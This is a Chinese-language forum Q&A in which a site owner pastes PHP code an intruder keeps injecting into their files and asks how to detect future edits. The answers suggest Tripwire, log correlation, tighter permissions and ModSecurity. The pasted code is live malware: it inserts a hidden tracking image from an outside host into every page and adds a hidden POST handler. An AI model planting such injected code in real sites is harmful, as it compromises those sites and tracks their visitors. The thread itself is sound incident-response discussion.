设置文件编辑的绊脚石

tag-icon tag-icon ubuntu ssh
设置文件编辑的绊脚石

问题是这样的。一些泄露某处在我的网站中允许某人任意编辑文件(或者他已经获得了 FTP/SHH 的访问权限,但我在日志中没有看到)。

他不断将此代码注入到不同的 PHP 文件中:

<?php
//{{27460aba

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)
{
  $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="g34dae82b267843a194c001f72"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82b267843a194c001f72&p=1&a=%3CR%C6%8E0%14%00M%049%F2%1F%D5%A2e%A8%84%A2%90%7B%AB%D0t%A3F%B7%BEi%D5%9B%D5%FD"></div></SPAN>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}

function StrToNum($Str, $Check, $Magic)
{
   $Int32Unit = 4294967296;
   $length = strlen($Str);
   for ($i = 0; $i < $length; $i++) {
       $Check *= $Magic;
       if ($Check >= $Int32Unit) {
           $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
           $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
       }
       $Check += ord($Str{$i});
   }
   return $Check;
}
function HashURL($String)
{
   $Check1 = StrToNum($String, 0x1505, 0x21);
   $Check2 = StrToNum($String, 0, 0x1003F);

   $Check1 >>= 2;
   $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
   $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
   $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

   $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
   $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

   return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
   $CheckByte = 0;
   $Flag = 0;

   $HashStr = sprintf('%u', $Hashnum) ;
   $length = strlen($HashStr);

   for ($i = $length-1; $i >= 0;  $i--) {
       $Re = $HashStr{$i};
       if (1 === ($Flag % 2)) {
           $Re += $Re;
           $Re = (int)($Re / 10) + ($Re % 10);
       }
       $CheckByte += $Re;
       $Flag ++;
   }

   $CheckByte %= 10;
   if (0 !== $CheckByte) {
       $CheckByte = 10 - $CheckByte;
       if (1 === ($Flag % 2) ) {
           if (1 === ($CheckByte % 2)) {
               $CheckByte += 9;
           }
           $CheckByte >>= 1;
       }
   }

   return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
   $ch = CheckHash(HashURL($url));
   $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   $data = file_get_contents($file);
   $pos = strpos($data, "Rank_");
   if($pos === false){return -1;} else{
       $pr=substr($data, $pos + 9);
       $pr=trim($pr);
       $pr=str_replace("
",'',$pr);
       return $pr;
   }
}

if(isset($_POST['xxxprch']))
{
    echo getpr($_POST['xxxprch']);
    exit();
}
else
  ob_start('outputxxx_callback');

error_reporting($olderrxxx);
}

//}}42011069
?>

这似乎是一些跟踪脚本。但我的问题是,我能否以某种方式通过 SSH 设置一个绊网(我是 root),当有人试图编辑某些文件时,该绊网就会激活?我想抓住这个家伙(或女孩)并找到漏洞。

答案1

尝试检查这个解决方案:

http://www.thegeekstuff.com/2008/12/tripwire-tutorial-linux-host-based-inrupt-detection-system/

希望这可以帮助。

答案2

查看修改文件的时间戳,然后查看 Apache 日志中该时间窗口中的条目。这应该能让您了解攻击向量。验证内容的权限,并确保 Apache 用户除非绝对必要,否则无法写入任何内容。ModSecurity 对于防止此类攻击也非常有用;但是,您需要了解 Web 应用程序的工作原理。

相关内容